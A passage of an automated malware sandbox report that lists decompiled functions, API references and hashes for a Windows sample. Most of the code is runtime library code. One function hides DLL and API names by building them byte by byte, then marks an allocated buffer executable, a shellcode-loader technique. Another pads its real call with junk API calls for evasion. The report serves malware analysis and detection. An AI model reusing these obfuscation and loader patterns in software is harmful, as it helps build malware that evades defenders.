0x0040e69d
0x0040e676
0x0040e676
0x0040e679
0x0040e67f
0x0040e67f
0x0040e6a3
0x0040e6a6
0x00000000
0x0040e6a6
0x0040e66b
0x0040e66b
0x00000000

Strings

QQ, xrefs: 0040E659

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: a79f2a55b70b48562d031569dee796319e050da196c01ba98a9978d77b7697c1
Instruction ID: 95bfd814b450d1b0e086c995e581eef2b3417fa439b8e070b72ca9ba4eac3c5e
Opcode Fuzzy Hash: a79f2a55b70b48562d031569dee796319e050da196c01ba98a9978d77b7697c1
Instruction Fuzzy Hash: 71014BB1A00109EBCB00CF55E840B9F73B4AB68304F548D6AF80597380D23EEA72DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00411CE0 Relevance: 1.5, APIs: 1, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00411CE0() {
				void* _t1;

				_t1 = E00411C10(0); // executed
				return _t1;
			}

0x00411ce7
0x00411cf0

APIs

__encode_pointer.LIBCMTD ref: 00411CE7

Part of subcall function 00411C10: TlsGetValue.KERNEL32(00000001), ref: 00411C25
Part of subcall function 00411C10: TlsGetValue.KERNEL32(00000001,00000001), ref: 00411C46
Part of subcall function 00411C10: __crt_wait_module_handle.LIBCMTD ref: 00411C5C
Part of subcall function 00411C10: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00411C76
Part of subcall function 00411C10: RtlEncodePointer.NTDLL(?), ref: 00411C97

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 568403282-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: fa74dd22aa38c04076bb8f3c427e19bfb3c6a28b44a15c01b0b428bf126a5abe
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: 33A012725C420823D04021833807B02350C43C0678F080021F70C051423842A4A040D7

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9B0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				void* _t3;
				void* _t4;

				E00416C50(); // executed
				_t2 = L0040D9D0(_t3, _t4); // executed
				return _t2;
			}

0x0040d9b5
0x0040d9ba
0x00000000

APIs

___security_init_cookie.LIBCMTD ref: 0040D9B5

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: faa0f95278e7d1c288f2c07ff3ed3f12c7c615b45ecd37f7366b2f0e85f7e719
Instruction ID: d6d303b49ab12bc0872e887969031b631620804fd152af3969974b00f2ecad07
Opcode Fuzzy Hash: faa0f95278e7d1c288f2c07ff3ed3f12c7c615b45ecd37f7366b2f0e85f7e719
Instruction Fuzzy Hash: 80A0026160464816465033E7090794A754E88C0758F96002B755D521436C6CE84590EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A14C Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A14C() {
				void* _t1;

				_t1 = GlobalAlloc(0,  *0x4e3424); // executed
				 *0x4c6880 = _t1;
				return _t1;
			}

0x0040a154
0x0040a15a
0x0040a15f

APIs

GlobalAlloc.KERNELBASE(00000000,0040A53C), ref: 0040A154

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: ad4712b042d6c6dabb331f47ee030d5c51214da4cb4760481cb1f7daf52ba487
Instruction ID: 0453c60e9b989a9a0e88ae6e9c5ec5572c70ed1fd3e1073910a7c40caeedc164
Opcode Fuzzy Hash: ad4712b042d6c6dabb331f47ee030d5c51214da4cb4760481cb1f7daf52ba487
Instruction Fuzzy Hash: E6B01274005140CBD7426F50AE08B007AB0F30C303F004031E944962B1D7300000AB38

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409E23 Relevance: 19.6, APIs: 13, Instructions: 100
filethreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00409E23(unsigned int _a4, unsigned int _a8, void* _a10, intOrPtr _a12) {
				void* _v6;
				struct _COORD _v8;
				int _v12;
				struct _DCB _v40;
				struct _OSVERSIONINFOA _v188;
				struct _WIN32_FIND_DATAW _v780;
				short _v2828;
				short _v4876;
				unsigned int _t25;
				int _t26;
				unsigned int _t48;

				E0040C5C0(0x1308);
				if( *0x4e3424 == 0x516) {
					VerLanguageNameW(0,  &_v2828, 0);
					SetDefaultCommConfigW(0, 0, 0);
					_v8 = 0;
					asm("stosw");
					ReadConsoleOutputCharacterW(0,  &_v4876, 0, _v8,  &_v12);
				}
				_t25 = _a8 >> 3;
				if(_t25 > 0) {
					_t48 = _a4;
					_a4 = _t25;
					do {
						if( *0x4e3424 == 0x29) {
							BuildCommDCBA(0,  &_v40);
							CopyFileExA(0, 0, 0, 0, 0, 0);
						}
						if( *0x4e3424 == 0xe1b) {
							FindNextFileW(0,  &_v780);
							SetEvent(0);
						}
						if( *0x4e3424 == 0x1c) {
							FreeResource(0);
							GetVersionExA( &_v188);
							SetLastError(0);
							TerminateThread(0, 0);
							_v8 = 0;
							__imp__DeleteTimerQueueTimer( &_v8, 0, 0);
						}
						_t26 = E00409CAC(_t48, _a12);
						if( *0x4e3424 == 0x4fa) {
							_a8 = 0;
							asm("stosw");
							_t26 = FillConsoleOutputCharacterA(0, 0, 0, _a8,  &_v12);
						}
						_t48 = _t48 + 8;
						_t20 =  &_a4;
						 *_t20 = _a4 - 1;
					} while ( *_t20 != 0);
					return _t26;
				}
				return _t25;
			}

0x00409e2b
0x00409e3e
0x00409e49
0x00409e51
0x00409e59
0x00409e60
0x00409e72
0x00409e72
0x00409e7b
0x00409e80
0x00409e87
0x00409e8a
0x00409e8d
0x00409e94
0x00409e9b
0x00409ea7
0x00409ea7
0x00409eb7
0x00409ec1
0x00409ec8
0x00409ec8
0x00409ed5
0x00409ed8
0x00409ee5
0x00409eec
0x00409ef4
0x00409f00
0x00409f03
0x00409f03
0x00409f0d
0x00409f1c
0x00409f20
0x00409f27
0x00409f33
0x00409f33
0x00409f39
0x00409f3c
0x00409f3c
0x00409f3c
0x00000000
0x00409f45
0x00409f49

APIs

VerLanguageNameW.KERNEL32(00000000,?,00000000), ref: 00409E49
SetDefaultCommConfigW.KERNEL32(00000000,00000000,00000000), ref: 00409E51
ReadConsoleOutputCharacterW.KERNEL32(00000000,?,00000000,?,?), ref: 00409E72
BuildCommDCBA.KERNEL32(00000000,?), ref: 00409E9B
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409EA7
FindNextFileW.KERNEL32(00000000,?), ref: 00409EC1
SetEvent.KERNEL32(00000000), ref: 00409EC8
FreeResource.KERNEL32(00000000), ref: 00409ED8
GetVersionExA.KERNEL32(?), ref: 00409EE5
SetLastError.KERNEL32(00000000), ref: 00409EEC
TerminateThread.KERNEL32(00000000,00000000), ref: 00409EF4
DeleteTimerQueueTimer.KERNEL32(?,00000000,00000000), ref: 00409F03
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00409F33

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: CharacterCommConsoleFileOutputTimer$BuildConfigCopyDefaultDeleteErrorEventFillFindFreeLanguageLastNameNextQueueReadResourceTerminateThreadVersion
String ID:
API String ID: 1896075712-0
Opcode ID: 71c443a97d489385b007adc257ae83c2ea9c22b018d1d0a7d445dc2d9079d353
Instruction ID: 151b0cd385862a43d34d60f7ed90395eb2cea35308d35229965241947fe5cc1c
Opcode Fuzzy Hash: 71c443a97d489385b007adc257ae83c2ea9c22b018d1d0a7d445dc2d9079d353
Instruction Fuzzy Hash: B0310875402168FBCB12DFA0DE489DF7BBCEF49351B004066F549E2162D7389B85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00410900(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x4bb4ec; // 0x2588ab5e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4e3d68 = _t6;
				 *0x4e3d64 = _t20;
				 *0x4e3d60 = _t22;
				 *0x4e3d5c = _t19;
				 *0x4e3d58 = _t25;
				 *0x4e3d54 = _t24;
				 *0x4e3d80 = ss;
				 *0x4e3d74 = cs;
				 *0x4e3d50 = ds;
				 *0x4e3d4c = es;
				 *0x4e3d48 = fs;
				 *0x4e3d44 = gs;
				asm("pushfd");
				_pop( *0x4e3d78);
				 *0x4e3d6c =  *_t29;
				 *0x4e3d70 = _v0;
				 *0x4e3d7c =  &_a4;
				 *0x4e3cb8 = 0x10001;
				_t11 =  *0x4e3d70; // 0x0
				 *0x4e3c6c = _t11;
				 *0x4e3c60 = 0xc0000409;
				 *0x4e3c64 = 1;
				_t21 =  *0x4bb4ec; // 0x2588ab5e
				_v812 = _t21;
				_t23 =  *0x4bb4f0; // 0xda7754a1
				_v808 = _t23;
				 *0x4e3cb0 = IsDebuggerPresent();
				_push(1);
				E00411BF0(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter("`<N");
				if( *0x4e3cb0 == 0) {
					_push(1);
					E00411BF0(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00410900
0x00410900
0x00410900
0x00410900
0x00410900
0x00410900
0x00410900
0x00410906
0x00410908
0x00410908
0x0041bc9b
0x0041bca0
0x0041bca6
0x0041bcac
0x0041bcb2
0x0041bcb8
0x0041bcbe
0x0041bcc5
0x0041bccc
0x0041bcd3
0x0041bcda
0x0041bce1
0x0041bce8
0x0041bce9
0x0041bcf2
0x0041bcfa
0x0041bd02
0x0041bd0d
0x0041bd17
0x0041bd1c
0x0041bd21
0x0041bd2b
0x0041bd35
0x0041bd3b
0x0041bd41
0x0041bd47
0x0041bd53
0x0041bd58
0x0041bd5a
0x0041bd64
0x0041bd6f
0x0041bd7c
0x0041bd7e
0x0041bd80
0x0041bd85
0x0041bd9d

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BD4D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BD64
UnhandledExceptionFilter.KERNEL32(`<N), ref: 0041BD6F
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BD8D
TerminateProcess.KERNEL32(00000000), ref: 0041BD94

Strings

`<N, xrefs: 0041BD6A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: `<N
API String ID: 2579439406-1426130778
Opcode ID: 06d6d41c93e8ed5d49ca7d2bdecad7aa66e17bdbe5bfcc957e3a064b580db011
Instruction ID: f5c582a66b7bc978ea8cacb4c629c446356ed13d384350bcbff7ae485f904ced
Opcode Fuzzy Hash: 06d6d41c93e8ed5d49ca7d2bdecad7aa66e17bdbe5bfcc957e3a064b580db011
Instruction Fuzzy Hash: DE21F6B5800288EBD716DF28FD88A547BB4FB48706F10457AE9089B372E7749684CF8D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A04E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A04E(void* __ecx) {
				char _v8;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				void* _t7;
				CHAR* _t8;

				_t8 = "msimg32.dll";
				"simg32.dll" = 0x65;
				"img32.dll" = 0x72;
				 *0x4bc1d0 = 0x2e;
				 *0x4bc1d1 = 0x64;
				 *0x4bc1d2 = 0x6c;
				 *0x4bc1d4 = 0;
				M004BC1CC = 0x65;
				"32.dll" = 0x6c;
				 *0x4bc1ce = 0x33;
				 *0x4bc1cf = 0x32;
				 *0x4bc1d3 = 0x6c;
				M004BC1CB = 0x6e;
				"msimg32.dll" = 0x6b;
				_t2 = LoadLibraryA(_t8);
				 *0x4e2abc = _t2;
				 *0x4bc1d6 = 0;
				 *0x4bc1cf = 0x50;
				"32.dll" = 0x61;
				 *0x4bc1d1 = 0x6f;
				 *0x4bc1d5 = 0x74;
				 *0x4bc1d3 = 0x65;
				M004BC1CC = 0x75;
				 *0x4bc1ce = 0x6c;
				"simg32.dll" = 0x69;
				 *0x4bc1d4 = 0x63;
				M004BC1CB = 0x74;
				 *0x4bc1d2 = 0x74;
				"img32.dll" = 0x72;
				"msimg32.dll" = 0x56;
				 *0x4bc1d0 = 0x72;
				_t3 = GetProcAddress(_t2, _t8);
				 *0x4bc1c4 = _t3;
				return  *_t3( *0x4c6880,  *0x4e3424, 0x40,  &_v8, _t7, __ecx);
			}

0x0040a053
0x0040a059
0x0040a060
0x0040a067
0x0040a06e
0x0040a075
0x0040a07c
0x0040a083
0x0040a08a
0x0040a091
0x0040a098
0x0040a09f
0x0040a0a6
0x0040a0ad
0x0040a0b4
0x0040a0bc
0x0040a0c1
0x0040a0c8
0x0040a0cf
0x0040a0d6
0x0040a0dd
0x0040a0e4
0x0040a0eb
0x0040a0f2
0x0040a0f9
0x0040a100
0x0040a107
0x0040a10e
0x0040a115
0x0040a11c
0x0040a123
0x0040a12a
0x0040a13c
0x0040a14b

APIs

LoadLibraryA.KERNEL32(msimg32.dll), ref: 0040A0B4
GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 0040A12A

Strings

msimg32.dll, xrefs: 0040A053, 0040A058, 0040A0BA

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: msimg32.dll
API String ID: 2574300362-3287713914
Opcode ID: c0d2799bbc65c9f1578efbc027e6a43b01dea3d35b816ef0f35254d7a7c7a425
Instruction ID: 8a6a3c7bab4d3ce723abd415f8b46ab20f717ac81cc442fa587a58fd69b9bda8
Opcode Fuzzy Hash: c0d2799bbc65c9f1578efbc027e6a43b01dea3d35b816ef0f35254d7a7c7a425
Instruction Fuzzy Hash: E621666254C2C4DBE302C72CADC87523E966726749F0842A9E5846E2B3C2FB1558DF7E

Uniqueness

Uniqueness Score: -1.00%

Function 00416C30 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416C30() {

				SetUnhandledExceptionFilter(E00416BC0);
				return 0;
			}

0x00416c3a
0x00416c43

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00016BC0), ref: 00416C3A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bd59e05dad22b1bc7517d500cfd0ac2e6b9725479bb8b9bd5157c21fe4a0570d
Instruction ID: dcecf1584866d35d9c1291a55dc64ef8c72583073658298c9dd75f948ecc77d4
Opcode Fuzzy Hash: bd59e05dad22b1bc7517d500cfd0ac2e6b9725479bb8b9bd5157c21fe4a0570d
Instruction Fuzzy Hash: 0DB0123114820C27430023E26C098123A8CC5CA7303520022F22CC5010D862E5418059

Uniqueness

Uniqueness Score: -1.00%

Function 004125CE Relevance: 98.4, APIs: 33, Strings: 23, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004125CE(struct _OVERLAPPED* __ecx) {
				CHAR* _t147;
				long _t160;
				void* _t164;
				void* _t167;
				void* _t171;
				struct _OVERLAPPED* _t179;
				struct _OVERLAPPED* _t197;
				struct _OVERLAPPED** _t198;
				void* _t208;
				void* _t209;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t262;
				signed int _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				void* _t271;

				_t210 = __ecx;
				if(InterlockedIncrement(0x4bb7ac) <= 0) {
					if( *((intOrPtr*)(_t263 + 0x18)) != 0) {
						 *(_t263 - 0x5034) = 0;
						 *(_t263 - 0x5038) =  *(L00411810(_t210));
						 *(L00411810( *(L00411810(_t210)))) = 0;
						_t236 = _t263 - 0x5030;
						_t197 = E0041D580(_t263 - 0x5030, 0x1000, 0xfeb,  *((intOrPtr*)(_t263 + 0x18)),  *((intOrPtr*)(_t263 + 0x1c)));
						_t265 = _t265 + 0x14;
						 *(_t263 - 0x5034) = _t197;
						if( *(_t263 - 0x5034) < 0) {
							E0040CCC0( *((intOrPtr*)(L00411810(_t236))), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x12d, 0);
							_t265 = _t265 + 0x20;
						}
						_t198 = L00411810(_t236);
						_t210 =  *(_t263 - 0x5038);
						 *_t198 =  *(_t263 - 0x5038);
						if( *(_t263 - 0x5034) < 0) {
							E0040CC90(E004109A0(_t208, _t210, _t259, _t261, _t263 - 0x5030, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t199, L"strcpy_s(szUserMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x130, 0);
							_t265 = _t265 + 0x24;
						}
					}
					if( *(_t263 + 8) == 2) {
						if( *((intOrPtr*)(_t263 + 0x18)) == 0) {
							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed!";
						} else {
							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed: ";
						}
						_t210 = _t263 - 0x4030;
						E0040CC90(E004109A0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x4030, 0x1000,  *((intOrPtr*)(_t263 - 0x5068))), _t192, L"strcpy_s(szLineMessage, 4096, szFormat ? \"Assertion failed: \" : \"Assertion failed!\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x135, 0);
						_t265 = _t265 + 0x24;
					}
					E0040CC90(E0041C9C0(_t208, _t210, _t259, _t261, _t263 - 0x4030, 0x1000, _t263 - 0x5030), _t136, L"strcat_s(szLineMessage, 4096, szUserMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x137, 0);
					_t267 = _t265 + 0x24;
					if( *(_t263 + 8) == 2) {
						_t234 =  *(_t263 + 8);
						if(( *(0x4bb7b0 +  *(_t263 + 8) * 4) & 0x00000001) != 0) {
							E0040CC90(E0041C9C0(_t208, _t234, _t259, _t261, _t263 - 0x4030, 0x1000, "\r"), _t189, L"strcat_s(szLineMessage, 4096, \"\\r\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13c, 0);
							_t267 = _t267 + 0x24;
						}
						_t210 = _t263 - 0x4030;
						E0040CC90(E0041C9C0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x4030, 0x1000, "\n"), _t186, L"strcat_s(szLineMessage, 4096, \"\\n\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13d, 0);
						_t267 = _t267 + 0x24;
					}
					if( *(_t263 + 0xc) == 0) {
						E0040CC90(E004109A0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x3028, 0x1000, _t263 - 0x4030), _t138, L"strcpy_s(szOutMessage, 4096, szLineMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x14b, 0);
						_t269 = _t267 + 0x24;
					} else {
						 *(_t263 - 0x503c) = 0;
						 *(_t263 - 0x5040) =  *(L00411810(_t210));
						 *(L00411810(_t210)) = 0;
						_push(_t263 - 0x4030);
						_t233 =  *(_t263 + 0x10);
						_push( *(_t263 + 0x10));
						_t179 = E0041BA90( *(_t263 + 0x10), _t263 - 0x3028, 0x1000, 0xfff, "%s(%d) : %s",  *(_t263 + 0xc));
						_t269 = _t267 + 0x1c;
						 *(_t263 - 0x503c) = _t179;
						if( *(_t263 - 0x503c) < 0) {
							E0040CCC0( *(L00411810(_t233)), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x144, 0);
							_t269 = _t269 + 0x20;
						}
						 *(L00411810(_t233)) =  *(_t263 - 0x5040);
						if( *(_t263 - 0x503c) < 0) {
							E0040CC90(E004109A0(_t208, _t233, _t259, _t261, _t263 - 0x3028, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t182, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x147, 0);
							_t269 = _t269 + 0x24;
						}
					}
					 *(_t263 - 0x5044) = 0;
					 *(_t263 - 0x5048) = 0;
					_t240 = _t263 - 0x5044;
					 *(_t263 - 0x5048) = E0041C990(_t263 - 0x5044, _t263 - 0x2020, 0x1000, _t263 - 0x3028, 0xffffffff);
					E0040CCC0( *(_t263 - 0x5048), 0x16, 0x22, L"e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x150, 0);
					_t271 = _t269 + 0x34;
					if( *(_t263 - 0x5048) != 0) {
						E0040CC90(E00413C80(_t208, _t263 - 0x2020, _t259, _t261, _t263 - 0x2020, 0x1000, L"_CrtDbgReport: String too long or Invalid characters in String"), _t173, L"wcscpy_s(szOutMessage2, 4096, L\"_CrtDbgReport: String too long or Invalid characters in String\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x152, 0);
						_t271 = _t271 + 0x24;
					}
					if( *0x4e41e8 != 0 ||  *0x4e41e4 != 0) {
						 *(_t263 - 0x5050) = 0;
						 *(_t263 - 0x504c) = 0;
						L004110F0(0xf);
						_t271 = _t271 + 4;
						 *(_t263 - 4) = 1;
						_t240 =  *0x4e41e8;
						 *(_t263 - 0x5050) =  *0x4e41e8;
						while( *(_t263 - 0x5050) != 0) {
							 *(_t263 - 0x5054) = 0;
							_t240 =  *(_t263 - 0x5050);
							_t171 =  *(( *(_t263 - 0x5050))[0xc])( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x5054);
							_t271 = _t271 + 0xc;
							if(_t171 == 0) {
								 *(_t263 - 0x5050) = ( *(_t263 - 0x5050))[4];
								continue;
							}
							 *(_t263 - 0x302c) = 1;
							 *(_t263 - 0x2024) =  *(_t263 - 0x5054);
							break;
						}
						if( *(_t263 - 0x302c) != 0) {
							L43:
							 *(_t263 - 4) = 0;
							E00412B65();
							goto L44;
						}
						_t240 =  *0x4e41e4;
						 *(_t263 - 0x504c) =  *0x4e41e4;
						while( *(_t263 - 0x504c) != 0) {
							 *(_t263 - 0x5058) = 0;
							_t240 =  *(_t263 - 0x504c);
							_t167 =  *(( *(_t263 - 0x504c))[0xc])( *(_t263 + 8), _t263 - 0x2020, _t263 - 0x5058);
							_t271 = _t271 + 0xc;
							if(_t167 == 0) {
								 *(_t263 - 0x504c) = ( *(_t263 - 0x504c))[4];
								continue;
							}
							 *(_t263 - 0x302c) = 1;
